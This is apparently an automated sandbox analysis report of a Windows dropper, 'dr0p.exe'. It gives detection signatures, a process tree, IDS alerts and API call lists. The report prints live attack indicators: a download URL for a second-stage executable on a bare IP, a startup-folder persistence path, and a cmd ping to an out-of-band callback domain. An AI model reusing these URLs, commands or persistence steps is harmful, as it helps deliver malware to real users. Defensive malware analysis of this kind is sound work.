Edit tour

Windows Analysis Report
dr0p.exe

Overview

General Information

Sample name:	dr0p.exe
Analysis ID:	1584651
MD5:	d085f244d635d6e43546e63649ea2e67
SHA1:	52dcf3734c43becb6d66e399186b760da511c19a
SHA256:	d40b523a10b6a72a37b9ee419f6a1d38403d1a8676ceddb3186ec85289ad1f29
Tags:	exeuser-zhuzhu0009
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Drops PE files to the startup folder

Found API chain with Download & Execute functionality

Machine Learning detection for sample

Uses ping.exe to check the status of other devices and networks

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

File is packed with WinRar

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

dr0p.exe (PID: 5412 cmdline: "C:\Users\user\Desktop\dr0p.exe" MD5: D085F244D635D6E43546E63649EA2E67)

mh.exe (PID: 1176 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe" MD5: 287EEBE03B7EC7488ED2AE07A5E98CF0)

q.exe (PID: 1596 cmdline: "C:\Users\user\Desktop\q.exe" hm.exe MD5: 935809D393A2BF9F0E886A41FF5B98BE)

conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

hm.exe (PID: 5788 cmdline: "C:\Users\user\Desktop\hm.exe" MD5: 692D72923747BE1ED2C05CD6B4118BF4)

conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1616 cmdline: "C:\Windows\System32\cmd.exe" /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 5976 cmdline: ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun MD5: B3624DD758CCECF93A1226CEF252CA12)

cleanup

Sigma Signatures

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\dr0p.exe, ProcessId: 5412, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T06:03:58.177534+0100	2019714	2	Potentially Bad Traffic	192.168.2.6	49709	23.27.51.244	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T06:03:58.177534+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	49709	23.27.51.244	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\Desktop\hm.exe	ReversingLabs: Detection: 29%

Multi AV Scanner detection for submitted file

Source: dr0p.exe	Virustotal: Detection: 18%			Perma Link
Source: dr0p.exe	ReversingLabs: Detection: 23%

Machine Learning detection for sample

Source: dr0p.exe

Joe Sandbox ML: detected

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: mh.exe, 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmp, mh.exe, 00000003.00000000.2155289932.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmp, mh.exe.0.dr

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EBB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	3_2_00007FF741EBB190
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EA40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	3_2_00007FF741EA40BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741ECFCA0 FindFirstFileExA,	3_2_00007FF741ECFCA0

Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun

Source: global traffic

TCP traffic: 192.168.2.6:60428 -> 162.159.36.2:53

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 Jan 2025 05:03:58 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 06 Jan 2025 04:27:52 GMTETag: "1d3dc2-62b020d388200"Accept-Ranges: bytesContent-Length: 1916354Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 24 84 32 e2 60 e5 5c b1 60 e5 5c b1 60 e5 5c b1 d4 79 ad b1 68 e5 5c b1 d4 79 af b1 eb e5 5c b1 d4 79 ae b1 6d e5 5c b1 e0 9e a1 b1 62 e5 5c b1 e0 9e 58 b0 72 e5 5c b1 e0 9e 5f b0 6a e5 5c b1 e0 9e 59 b0 59 e5 5c b1 69 9d df b1 69 e5 5c b1 69 9d db b1 62 e5 5c b1 69 9d cf b1 67 e5 5c b1 60 e5 5d b1 43 e4 5c b1 ee 9e 59 b0 52 e5 5c b1 ee 9e 5c b0 61 e5 5c b1 ee 9e a3 b1 61 e5 5c b1 ee 9e 5e b0 61 e5 5c b1 52 69 63 68 60 e5 5c b1 00 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 23 97 40 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 21 00 68 04 00 00 38 03 00 00 00 00 00 e0 2e 03 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 08 00 00 04 00 00 00 00 00 00 02 00 60 c1 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 97 05 00 34 00 00 00 d4 97 05 00 50 00 00 00 00 00 07 00 60 e3 00 00 00 a0 06 00 6c 30 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 70 09 00 00 c0 36 05 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 37 05 00 28 00 00 00 f0 b3 04 00 40 01 00 00 00 00 00 00 00 00 00 00 00 80 04 00 08 05 00 00 bc 88 05 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6e 67 04 00 00 10 00 00 00 68 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 28 01 00 00 80 04 00 00 2a 01 00 00 6c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c e7 00 00 00 b0 05 00 00 1a 00 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 6c 30 00 00 00 a0 06 00 00 32 00 00 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 60 03 00 00 00 e0 06 00 00 04 00 00 00 e2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 5f 52 44 41 54 41 00 00 5c 01 00 00 00 f0 06 00 00 02 00 00 00 e6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 60 e3 00 00 00 00 07 00 00 e4 00 00 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 70 09 00 00 00 f0 07 00 00 0a 00 00 00 cc 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49709 -> 23.27.51.244:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49709 -> 23.27.51.244:80

Source: global traffic

HTTP traffic detected: GET /mh.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 23.27.51.244Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244

Source: C:\Users\user\Desktop\dr0p.exe

Code function: 0_2_0042006A InternetOpenA,InternetOpenUrlA,SHGetFolderPathA,lstrcat,lstrcat,lstrcat,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ShellExecuteA,ShellExecuteA,ShellExecuteA,exit,

0_2_0042006A

Source: global traffic

HTTP traffic detected: GET /mh.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 23.27.51.244Cache-Control: no-cache

Source: dr0p.exe, dr0p.exe, 00000000.00000002.2157971429.0000000000420000.00000040.00000001.01000000.00000003.sdmp, dr0p.exe, 00000000.00000002.2162499969.0000000005855000.00000004.00000020.00020000.00000000.sdmp, dr0p.exe, 00000000.00000003.2154650025.0000000005855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.27.51.244/mh.exe
Source: dr0p.exe, 00000000.00000002.2157971429.0000000000420000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://23.27.51.244/mh.exe/c

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: 3_2_00007FF741E9C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

3_2_00007FF741E9C2F0

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EBB190	3_2_00007FF741EBB190
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EAA4AC	3_2_00007FF741EAA4AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EB3484	3_2_00007FF741EB3484
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EC0754	3_2_00007FF741EC0754
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741E9F930	3_2_00007FF741E9F930
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EA4928	3_2_00007FF741EA4928
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EBCE88	3_2_00007FF741EBCE88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741E95E24	3_2_00007FF741E95E24
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EB1F20	3_2_00007FF741EB1F20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741E9A310	3_2_00007FF741E9A310
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741E9C2F0	3_2_00007FF741E9C2F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741E97288	3_2_00007FF741E97288
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EA126C	3_2_00007FF741EA126C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EB21D0	3_2_00007FF741EB21D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EAF180	3_2_00007FF741EAF180
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EB53F0	3_2_00007FF741EB53F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741E976C0	3_2_00007FF741E976C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741ED2550	3_2_00007FF741ED2550
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EAB534	3_2_00007FF741EAB534
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741E94840	3_2_00007FF741E94840
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741ECC838	3_2_00007FF741ECC838
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741ED5AF8	3_2_00007FF741ED5AF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EB2AB0	3_2_00007FF741EB2AB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741E91AA4	3_2_00007FF741E91AA4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741ECFA94	3_2_00007FF741ECFA94
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EA1A48	3_2_00007FF741EA1A48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EC89A0	3_2_00007FF741EC89A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EAC96C	3_2_00007FF741EAC96C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EB3964	3_2_00007FF741EB3964
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EC8C1C	3_2_00007FF741EC8C1C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EB4B98	3_2_00007FF741EB4B98
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EABB90	3_2_00007FF741EABB90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EA5B60	3_2_00007FF741EA5B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EC0754	3_2_00007FF741EC0754
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EB8DF4	3_2_00007FF741EB8DF4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EB2D58	3_2_00007FF741EB2D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741ED2080	3_2_00007FF741ED2080
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EAAF18	3_2_00007FF741EAAF18

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\hm.exe C035C371F1AD9A96B51F28FBE9E6F7A402BF10CD1CA2D82AABBC78BA07C7703F

Source: hm.exe.3.dr

Static PE information: Number of sections : 11 > 10

Source: dr0p.exe

Static PE information: No import functions for PE file found

Source: dr0p.exe, 00000000.00000002.2162499969.00000000058A4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs dr0p.exe

Source: classification engine

Classification label: mal72.troj.adwa.winEXE@14/6@0/1

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: 3_2_00007FF741E9B6D8 GetLastError,FormatMessageW,LocalFree,

3_2_00007FF741E9B6D8

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: 3_2_00007FF741EB82C4 CoCreateInstance,

3_2_00007FF741EB82C4

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: 3_2_00007FF741EB8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

3_2_00007FF741EB8624

Source: C:\Users\user\Desktop\dr0p.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_03

Source: C:\Users\user\Desktop\dr0p.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dr0p.exe	Virustotal: Detection: 18%
Source: dr0p.exe	ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Users\user\Desktop\dr0p.exe "C:\Users\user\Desktop\dr0p.exe"
Source: C:\Users\user\Desktop\dr0p.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe"
Source: C:\Users\user\Desktop\dr0p.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Process created: C:\Users\user\Desktop\q.exe "C:\Users\user\Desktop\q.exe" hm.exe
Source: C:\Users\user\Desktop\q.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\q.exe	Process created: C:\Users\user\Desktop\hm.exe "C:\Users\user\Desktop\hm.exe"
Source: C:\Users\user\Desktop\hm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dr0p.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe"	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Process created: C:\Users\user\Desktop\q.exe "C:\Users\user\Desktop\q.exe" hm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Process created: C:\Users\user\Desktop\hm.exe "C:\Users\user\Desktop\hm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: mswsock.dll	Jump to behavior
